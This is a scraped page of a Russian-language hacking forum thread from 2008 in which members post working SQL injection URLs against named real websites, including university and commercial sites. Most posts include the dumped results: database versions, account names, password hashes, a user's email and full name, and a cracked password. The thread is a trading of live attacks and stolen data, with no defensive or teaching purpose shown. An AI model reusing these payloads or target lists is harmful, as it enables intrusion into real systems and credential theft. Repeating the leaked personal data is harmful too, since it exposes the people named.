ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7211  
Старый 28.12.2008, 02:30
Аватар для Yanker
Yanker
Познающий
Регистрация: 18.07.2008
Сообщений: 64
Провел на форуме:
550210

Репутация: 37
По умолчанию

masternet, там походу пофиксили ужо...
 
Ответить с цитированием

  #7212  
Старый 28.12.2008, 04:41
Аватар для spherics
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

С игрушкой известной связано Legends of Norrath !

Впечатлило количество....)

http://lonloot.ru/index.php?l=-4+union+select+1,2,concat_ws(0x3a3a,version(),user (),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50, 51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67 ,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,8 4,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100 ,101,102,103,104,105,106,107,108,109,110,111,112,1 13,114,115,116,117,118,119,120,121,122,123,124,125 ,126,127,128,129,130,131,132,133,134,135,136,137,1 38,139,140,141,142,143,144,145,146,147,148,149,150 ,151,152,153,154,155,156,157,158,159,160,161,162,1 63,164,165--

Database Version: 5.0.51a-community-log
Database name: a12kbru_lon
User name: a12kbru_lon@localhost


Getting Data from table users from database a12kbru_lon
Fields id:user_name:user_pass:e_mail:group_id:fio:in_orde rs:last_orders

[1]:24:nikonoff:cc1be2756ee268969328208597b5bd90:niko noff@inbox.ru:1:Константин Никонов:1:1
 
Ответить с цитированием

  #7213  
Старый 28.12.2008, 07:18
Аватар для sabe
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

Berkeley.edu - PR 9
Цитата:
http://eps.berkeley.edu/development/view_person.php?uid=-7517+union+select+1,2,3,email,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26+from+user/*
пр6 поддомена ) но жаль ничего у меня не вышло) смотрим...

-=Razor=-
Цитата:
http://www.etver.ru/catalog/index.php?type=category&first=1&offset=140&id=-1+union+select+concat_ws(0x3a,name,pwd)+from+chat_ users/*
http://www.etver.ru/meet/validate.php?validate=0&action=edit
не канает (

Последний раз редактировалось sabe; 28.12.2008 в 07:20..
 
Ответить с цитированием

  #7214  
Старый 28.12.2008, 08:11
Аватар для j0ker13
j0ker13
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме:
861008

Репутация: 58
По умолчанию

http://fc.medifirstsys.com/profile.php?pid=-1+union+select+1,2,concat_ws(0x3a,username,passwor d),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,3 8,39,40,41,42+from+users+limit+1,1/*

emedihub@localhost:5.0.45

amy:866c7ee013c58f01fa153a8d32c9ed57 -> 7788
 
Ответить с цитированием

  #7215  
Старый 28.12.2008, 10:33
Аватар для Iceangel_
Iceangel_
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию

Код:
http://www.kitana.ru/razdel.php?id=-1+union+select+1,2,3,concat_ws(char(32,45,32),id,login,psw,type,fio,phone,email)+from+personal
ТИЦ : 220 PR: 4
а что админку не выложил?
1.5 года назад на ней скуль нашел, пассы к админке несколько месяцев назад подходили...
 
Ответить с цитированием

  #7216  
Старый 28.12.2008, 11:46
Аватар для -=megahertz=-
-=megahertz=-
Участник форума
Регистрация: 23.05.2007
Сообщений: 103
Провел на форуме:
380957

Репутация: 56
Отправить сообщение для -=megahertz=- с помощью ICQ
По умолчанию

http://inf.by/metal/?grid=-61+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24/*
Version: 5.0.41
Db name: blogdb
User: blogadmin@localhost
 
Ответить с цитированием

  #7217  
Старый 28.12.2008, 14:10
Аватар для masternet
masternet
Участник форума
Регистрация: 18.05.2008
Сообщений: 130
Провел на форуме:
1113633

Репутация: 155
По умолчанию

http://www.eutrainingsite.com/open_details.php?id=-1+union+select+1,unhex(hex(group_concat(table_name ))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2, 21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 ,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,5 4,55+from+information_schema.tables--
http://www.eutrainingsite.com/open_details.php?id=-1+union+select+1,unhex(hex(group_concat(column_nam e))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53, 54,55+from+information_schema.columns+where+table_ name=0x61646d696e--
http://www.eutrainingsite.com/open_details.php?id=-1+union+select+1,concat_ws(char(32,45,32),felh_nev ,jelszo,jog_szint),3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,2,21,22,23,24,25,26,27,28,29,30,31,32 ,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,4 9,50,51,52,53,54,55+from+admin--
тиц 10 пр- 7
доступ в админку запрещён...
 
Ответить с цитированием

  #7218  
Старый 28.12.2008, 16:03
Аватар для $n@ke
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

MSSQL
Цитата:
http://www.sunion.warwick.ac.uk/archery/records/byarcher_viewscore.php?id=81%20or%201=@@version--
Цитата:
Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
 
Ответить с цитированием

  #7219  
Старый 28.12.2008, 16:44
Аватар для Gemini12
Gemini12
Познающий
Регистрация: 24.12.2008
Сообщений: 54
Провел на форуме:
253038

Репутация: 9
Отправить сообщение для Gemini12 с помощью ICQ
По умолчанию

http://presscenter.kz/index.php?show=news&id=1+union+select+1,2,3,4,5--

нихера не понял...
 
Ответить с цитированием

  #7220  
Старый 28.12.2008, 18:49
Аватар для $n@ke
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

Цитата:
http://www.exhibitionculture.arts.gla.ac.uk/gallery.php?gid=309
User exhibitions_user@localhost
Version: 5.0.22-Debian_0ubuntu6.06.11-log
Dbname: exhibitions
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ